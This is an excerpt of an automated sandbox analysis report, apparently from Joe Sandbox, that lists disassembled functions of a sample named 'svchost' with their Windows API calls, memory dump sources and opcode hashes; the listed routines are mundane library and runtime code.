                                                            • Instruction Fuzzy Hash: 4AE06535206125D6EA7236659C07B5F7668FB417B7F150113EC59F6191DF60CC0882E1
                                                            Function 00835ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00835AC2
                                                              • Part of subcall function 0083B505: __EH_prolog.LIBCMT ref: 0083B50A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: f44261e0b565ba9d17aba26491fcd8ed291ca16c866714d90bfff7ac5f579df3
                                                            • Instruction ID: 652fbc91a5d5561b6d38a22b2444205677e21443acfa45c4c38bec9e8572a4f2
                                                            • Opcode Fuzzy Hash: f44261e0b565ba9d17aba26491fcd8ed291ca16c866714d90bfff7ac5f579df3
                                                            • Instruction Fuzzy Hash: 72016D30410798DAD715E7ACC041BDEB7A4EF64304F51848EA55693282CBB41B08DAA3
                                                            Function 0083A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0083A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0083A592,000000FF,?,?), ref: 0083A6C4
                                                              • Part of subcall function 0083A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0083A592,000000FF,?,?), ref: 0083A6F2
                                                              • Part of subcall function 0083A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0083A592,000000FF,?,?), ref: 0083A6FE
                                                            • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0083A598
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Find$FileFirst$CloseErrorLast
                                                            • String ID:
                                                            • API String ID: 1464966427-0
                                                            • Opcode ID: 0fe17d9dbf207a4ed389549831ae3b472a601096da33650ed295bed6e246a6f7
                                                            • Instruction ID: 88c0b87c0504d60a01c1d66c0680098554df814f267fb1ae24b3d9f95244dd10
                                                            • Opcode Fuzzy Hash: 0fe17d9dbf207a4ed389549831ae3b472a601096da33650ed295bed6e246a6f7
                                                            • Instruction Fuzzy Hash: 96F08231009790AACB6657F88905BCB7B90BF9A331F048A4DF1FD92196C27550989BA3
                                                            Function 00840E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetThreadExecutionState.KERNEL32(00000001), ref: 00840E3D
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ExecutionStateThread
                                                            • String ID:
                                                            • API String ID: 2211380416-0
                                                            • Opcode ID: ec1dc56f85d5568f063b232fe3e9f5cf36e7a4cea036ad15bf3bb0f41eb28425
                                                            • Instruction ID: 0ec92f0ee6758979e7b7e33a4362e1e3eea5aa954efee4b3c804a57a2bfe4ff3
                                                            • Opcode Fuzzy Hash: ec1dc56f85d5568f063b232fe3e9f5cf36e7a4cea036ad15bf3bb0f41eb28425
                                                            • Instruction Fuzzy Hash: 9DD0C210A0105926DE11332C281D7FF2A06FFC6320F0D0026F249D7582DF6848C6B2A3
                                                            Function 0084A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GdipAlloc.GDIPLUS(00000010), ref: 0084A62C
                                                              • Part of subcall function 0084A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0084A3DA
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Gdip$AllocBitmapCreateFromStream
                                                            • String ID:
                                                            • API String ID: 1915507550-0
                                                            • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                            • Instruction ID: 78c28273b4630af07485178c4cdefef3f012ca98335e2352433457e503dc84e5
                                                            • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                            • Instruction Fuzzy Hash: 7FD0A97028020CBADF0AAF25CC0296E7A99FB20744F008021B842E9282FBB1D910A267
                                                            Function 0084E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • DloadProtectSection.DELAYIMP ref: 0084E5E3
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: DloadProtectSection
                                                            • String ID:
                                                            • API String ID: 2203082970-0
                                                            • Opcode ID: 2fe690f195a6585e2c4204e0975233fbe84db2f16c10086735774065a9d40f75
                                                            • Instruction ID: 00bbb3fd71941a42fb6dc678da032fe0d2e7c0f7028e032c6e90b01bf3821b9d
                                                            • Opcode Fuzzy Hash: 2fe690f195a6585e2c4204e0975233fbe84db2f16c10086735774065a9d40f75
                                                            • Instruction Fuzzy Hash: A1D012B01C42499BDF02FFACA84B7143354F33471DF990112F155E1591DBA84880C606
                                                            Function 008398BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileType.KERNELBASE(000000FF,008397BE), ref: 008398C8
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: FileType
                                                            • String ID:
                                                            • API String ID: 3081899298-0
                                                            • Opcode ID: cb7fea3d210a5a91923b734a905178f6dce4bc963e1489cad592cdd47c520ff6
                                                            • Instruction ID: de60a56655dd4b47521f27863a5f5a34cde489a4ff4693bf254e97db97cf5995
                                                            • Opcode Fuzzy Hash: cb7fea3d210a5a91923b734a905178f6dce4bc963e1489cad592cdd47c520ff6
                                                            • Instruction Fuzzy Hash: 7DC00234404505958E2156259845095B711FAD3365BB496A4D0A9C54B1C3A2CC57EE51
                                                            Function 0084E1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: bc0866f250d2360ba4bf184f2ade6f09f6b5f60c0dd65cca97e9b29eb808f2fc
                                                            • Instruction ID: cfceeff5d35500fdbc29d04699059bb9c139577bc30f1f94ae5c4268ed3a180a
                                                            • Opcode Fuzzy Hash: bc0866f250d2360ba4bf184f2ade6f09f6b5f60c0dd65cca97e9b29eb808f2fc
                                                            • Instruction Fuzzy Hash: BCB012D929810CBC350431892C07C37110CF0C5B15330843EFC52C0480D840BD040432
                                                            Function 0084E1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 188c7a1c4a7d8393752526786454bd13496d6eb86be3e7f88c33f4caa517748d
                                                            • Instruction ID: 3296b5536677d20f962a8dce5196f963592ae56592f3469383cb78735f336d29
                                                            • Opcode Fuzzy Hash: 188c7a1c4a7d8393752526786454bd13496d6eb86be3e7f88c33f4caa517748d
                                                            • Instruction Fuzzy Hash: 1CB012D529C10CAC3544718D2C07C37110CF0C4B15330403EF856C0190D8407D040632
                                                            Function 0084E1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: ac32d947c2659e789ae02060813be356f5d113bf7c1b33b7403cbe97f6019fc2
                                                            • Instruction ID: ac93438cdb072e7bb3bd68d4cee4dba06406045220358ca0a27051a23d41a2f3
                                                            • Opcode Fuzzy Hash: ac32d947c2659e789ae02060813be356f5d113bf7c1b33b7403cbe97f6019fc2
                                                            • Instruction Fuzzy Hash: 21B012D529800CAD354476492C07C37110CF0C5B11330C03EFC56C0280D840BC080532
                                                            Function 0084E282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 1b1aa5c46bc34f757573fe00e983a1faf5a944fc5c82e35103a1e70265f28b1e
                                                            • Instruction ID: 0c3667694d7e0e9466dd029ee8170bdc973b3daf08e466094cf1cd4bf023d233
                                                            • Opcode Fuzzy Hash: 1b1aa5c46bc34f757573fe00e983a1faf5a944fc5c82e35103a1e70265f28b1e
                                                            • Instruction Fuzzy Hash: 3EB012E129800CAC354471492D07C37518CF0C4B11330403EF856C0180EC407D050532
                                                            Function 0084EAE7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084EAF9
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: d829c87bfe50537babf41892b17a78f11d890c16d4daf6a692116fcdd43ceb9e
                                                            • Instruction ID: 33d18cb141a90f0f28d04e3a1b293530e53077584125491bfbb4818a3991949a
                                                            • Opcode Fuzzy Hash: d829c87bfe50537babf41892b17a78f11d890c16d4daf6a692116fcdd43ceb9e
                                                            • Instruction Fuzzy Hash: 68B012C629A45E7D3D04B2455D06C37410CF1E0B90330813EF511C4081DC800C050432
                                                            Function 0084E200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 340ecbc3ff60d9a5a6fb056bfef7676e1cc74ff5051cd9f474975d2a291264cc
                                                            • Instruction ID: 3ddbdd508e1b34fd4070361f9b154c50dc08b9ff26761ff89a2e7a5b80b573aa
                                                            • Opcode Fuzzy Hash: 340ecbc3ff60d9a5a6fb056bfef7676e1cc74ff5051cd9f474975d2a291264cc
                                                            • Instruction Fuzzy Hash: D2B012D139814CBD358472492C07C37110CF0C4B11330813FF856C0280D8407C480532
                                                            Function 0084E20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: a2c8a2e81d44c2260798ee75858525d7bb2e388babba9c86fd7fcebbf52f5829
                                                            • Instruction ID: 58c5a48d75a4a41c0bdfb3d0290314585e2b944080cbdc7d71f78d210af1e4c4
                                                            • Opcode Fuzzy Hash: a2c8a2e81d44c2260798ee75858525d7bb2e388babba9c86fd7fcebbf52f5829
                                                            • Instruction Fuzzy Hash: 50B012D129C00CAD354472492D07C37510CF0C4B11330803EF856C0280DC507D0D0532
                                                            Function 0084E21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 70add2cbe2d86db94cab5831dcbcc2fd802e19e0195e8730522c4f681d90393c
                                                            • Instruction ID: a84626d96cee2c32c41c29bb1138d1e2faf893284dc97e6112a4d0dbdd0661e8
                                                            • Opcode Fuzzy Hash: 70add2cbe2d86db94cab5831dcbcc2fd802e19e0195e8730522c4f681d90393c
                                                            • Instruction Fuzzy Hash: 97B012E529800CFC354471492C0BC37110CF0C5F11330803EFC56C0180D840BD040532
                                                            Function 0084E228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 64bc2683e8c5c8179aba9915ea5683368df227b281208d157724f520a8cd5b0b
                                                            • Instruction ID: 0e6bfa7961fec88e8f6668fefaac0977c6f21e41d8f1d94eee83cce1e7b749fa
                                                            • Opcode Fuzzy Hash: 64bc2683e8c5c8179aba9915ea5683368df227b281208d157724f520a8cd5b0b
                                                            • Instruction Fuzzy Hash: 7AB012E129810CFC358471492C0BC37110CF0C4F11330413FF856C0180D8407D440532
                                                            Function 0084E232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
